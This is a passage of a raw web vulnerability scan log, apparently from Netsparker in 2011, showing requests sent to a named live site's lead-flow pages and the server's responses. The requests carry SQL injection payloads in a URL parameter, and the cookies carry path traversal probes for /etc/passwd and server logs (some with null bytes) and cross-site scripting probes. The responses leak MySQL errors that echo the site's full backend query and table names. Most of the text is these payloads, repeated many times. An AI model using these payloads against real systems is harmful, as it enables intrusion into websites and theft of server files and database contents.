OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iig5diisqul3olm4irsljndr42; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/phsy00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=livvdcbe19llto6escv9d5ssf3; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/meac00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 